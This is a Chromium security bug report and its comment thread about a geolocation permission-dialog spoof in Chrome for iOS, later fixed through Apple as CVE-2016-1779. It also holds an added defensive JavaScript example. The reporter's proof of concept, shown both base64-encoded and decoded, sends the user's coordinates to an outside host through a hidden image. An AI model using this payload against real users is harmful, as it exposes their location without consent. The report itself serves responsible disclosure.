Project: chromium
Issue 494987 Security: Geolocation API Spoof in Chrome For iOS
Starred by 2 users. Reported by xis...@gmail.com, Jun 1 2015
Status: Fixed
Owner:
Closed: Jun 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 2
Type: Bug-Security
AFFECTED PRODUCTS
--------------------
iPhone:
Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/42.0.2311.47 Mobile/12F70 Safari/600.1.4 (000178)

iPad:
Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/42.0.2311.47 Mobile/12F69 Safari/600.1.4 (000134)

DESCRIPTION
--------------------
In Chrome for iOS, write "data:text/html,…… geolocation API……" in the URL address bar. The Geolocation API will pop up a location authorization dialog, and the domain will be displayed as "://". An attacker can make this location authorization dialog appear in another domain to spoof the user. When the user clicks Allow, the location will be acquired by the attacker.

PoC
--------------------

<a href="data:text/html;base64,PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CjxtZXRhIGNoYXJzZXQ9dXRmLTggLz4KPHRpdGxlPmdlb2xvY2F0aW9uPC90aXRsZT4KPGJvZHk+CjxzY3JpcHQ+CmZ1bmN0aW9uIHN1Y2Nlc3MocG9zaXRpb24pIHsKZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3JlbW90ZScpLnNyYz0iaHR0cDovL3hpc2lnci5jb20vdGVzdC9nZW8vZ2V0LnBocD9nZW9sb2NhdGlvbj0iKyItLS0tLS0iK2VuY29kZVVSSUNvbXBvbmVudChwb3NpdGlvbi5jb29yZHMubGF0aXR1ZGUpKyIsIitlbmNvZGVVUklDb21wb25lbnQocG9zaXRpb24uY29vcmRzLmxvbmdpdHVkZSk7CiB9Cm5hdmlnYXRvci5nZW9sb2NhdGlvbi5nZXRDdXJyZW50UG9zaXRpb24oc3VjY2Vzcyk7Cjwvc2NyaXB0Pgo8aW1nIGlkPSJyZW1vdGUiIHNyYz0iIiB3aWR0aD0wIGhlaWdodD0wPgo8L2JvZHk+CjwvaHRtbD4=" target="go" onclick="fake()"><h1>click me</h1></a>

<script>
    function fake() {
        if (navigator.userAgent.indexOf("iPhone") > -1) {
            setTimeout("gs()", 0);
        }
        if (navigator.userAgent.indexOf("iPad") > -1) {
            setTimeout("gs()", 200);
        }
    }
    function gs() {
        window.open('http://www.google.com', 'go');
    }
</script>

Base64 decode:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset=utf-8 />
<title>geolocation</title>
<body>
<script>
function success(position) {
document.getElementById('remote').src="http://xisigr.com/test/geo/get.php?geolocation="+"------"+encodeURIComponent(position.coords.latitude)+","+encodeURIComponent(position.coords.longitude);
 }
navigator.geolocation.getCurrentPosition(success);
</script>
<img id="remote" src="" width=0 height=0>
</body>
</html>

Online Demo: http://xisigr.com/test/geo/geo.html
User's location: http://xisigr.com/test/geo/info.txt

CREDIT
--------------------
This vulnerability was discovered by xisigr of Tencent's Xuanwu Lab (http://www.tencent.com).
Email: xisigr@gmail.com

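The report above combines two things: a data: document that has no scheme or host to show in the dialog (hence "://"), and a prompt that is still on screen after the named window "go" has been navigated to another site. The following is an added example, not code from the reporter or from Chromium, of a permission gate that refuses both: it never prompts for an opaque origin and it cancels pending prompts when the requesting document is replaced. PromptGate and its methods are hypothetical names; the URL class is the standard WHATWG one available in browsers and Node.

```javascript
class PromptGate {
  constructor() {
    this.docs = new Map();    // tabId -> { token, origin } for the document currently shown
    this.pending = new Map(); // promptId -> { tabId, token, origin }
    this.nextToken = 1;
  }

  // Only http(s) origins are ever displayed; data:, blob:, about:, javascript:
  // and unparsable URLs are treated as opaque (null), so no dialog reads "://".
  static originFor(urlString) {
    let u;
    try { u = new URL(urlString); } catch (e) { return null; }
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.origin : null;
  }

  // Every navigation installs a fresh document token for the tab and cancels
  // prompts raised by the document being replaced (the "go" window in the PoC).
  navigate(tabId, urlString) {
    const token = this.nextToken++;
    this.docs.set(tabId, { token, origin: PromptGate.originFor(urlString) });
    for (const [id, p] of this.pending) {
      if (p.tabId === tabId) this.pending.delete(id);
    }
    return token;
  }

  // A document asks for geolocation. Returns whether a dialog may be shown and
  // the exact origin string it must display.
  requestGeolocation(tabId, token) {
    const doc = this.docs.get(tabId);
    if (!doc || doc.token !== token) return { prompt: false, reason: 'stale document' };
    if (doc.origin === null) return { prompt: false, reason: 'opaque origin' };
    const promptId = 'p' + this.nextToken++;
    this.pending.set(promptId, { tabId, token, origin: doc.origin });
    return { prompt: true, displayOrigin: doc.origin, promptId };
  }

  // The user answers the dialog. Grant only if the requesting document is still
  // the one in the tab (defensive re-check on top of the cancellation above).
  answerPrompt(promptId, allow) {
    const p = this.pending.get(promptId);
    this.pending.delete(promptId);
    if (!p) return { granted: false, reason: 'prompt cancelled' };
    const doc = this.docs.get(p.tabId);
    if (!doc || doc.token !== p.token) return { granted: false, reason: 'document changed' };
    return { granted: allow, origin: p.origin };
  }
}
```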
 
Labels: Security_Severity-Low
Owner: lgar...@chromium.org
lgarron can you reproduce and triage this?  Thanks
Cc: pinkerton@chromium.org palmer@chromium.org
Labels: OS-iOS Cr-Security-UX Cr-Blink-Location Security_Impact-Stable
Status: Assigned
Summary: Security: Geolocation API Spoof in Chrome For iOS (was: Security: Geolocation API Spoof in Chrome For IOS)
Cc: stuartmorgan@chromium.org
Labels: -Cr-Blink-Location Cr-Mobile-WebView-Glue
+stuart, fixing labels
Geo auth is 100% controlled by UIWebView, so it's almost certain the only thing that we can do is file a Radar.

WKWebView doesn't delegate these either (which we have an existing Radar for), so I don't think we can do anything there either.
Status: ExternalDependency
Sounds like ExternalDependency, then?
Filed rdar://21289208
Comment 8 by laforge@google.com, Aug 24 2015
Labels: Pri-2
Adding default Pri-2
Comment 9 by xis...@gmail.com, Mar 22 2016
About the security content of iOS 9.3
https://support.apple.com/en-us/HT206166

WebKit
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may reveal a user's current location
Description: An issue existed in the parsing of geolocation requests. This was addressed through improved validation of the security origin for geolocation requests.
CVE-ID
CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)

Status: Fixed
Based on c#9 this is fixed, right? Please update this if that is incorrect.
Project Member Comment 11 by sheriffbot@chromium.org, Jun 11 2016
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: reward-topanel
Labels: -reward-topanel reward-unpaid Reward-500
Congratulations, the panel has decided to award $500 for this bug!  Our finance team will be in touch in the next few weeks with more details.
Labels: -reward-unpaid reward-inprocess
Project Member Comment 15 by sheriffbot@chromium.org, Sep 17 2016
Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 16 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 17 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label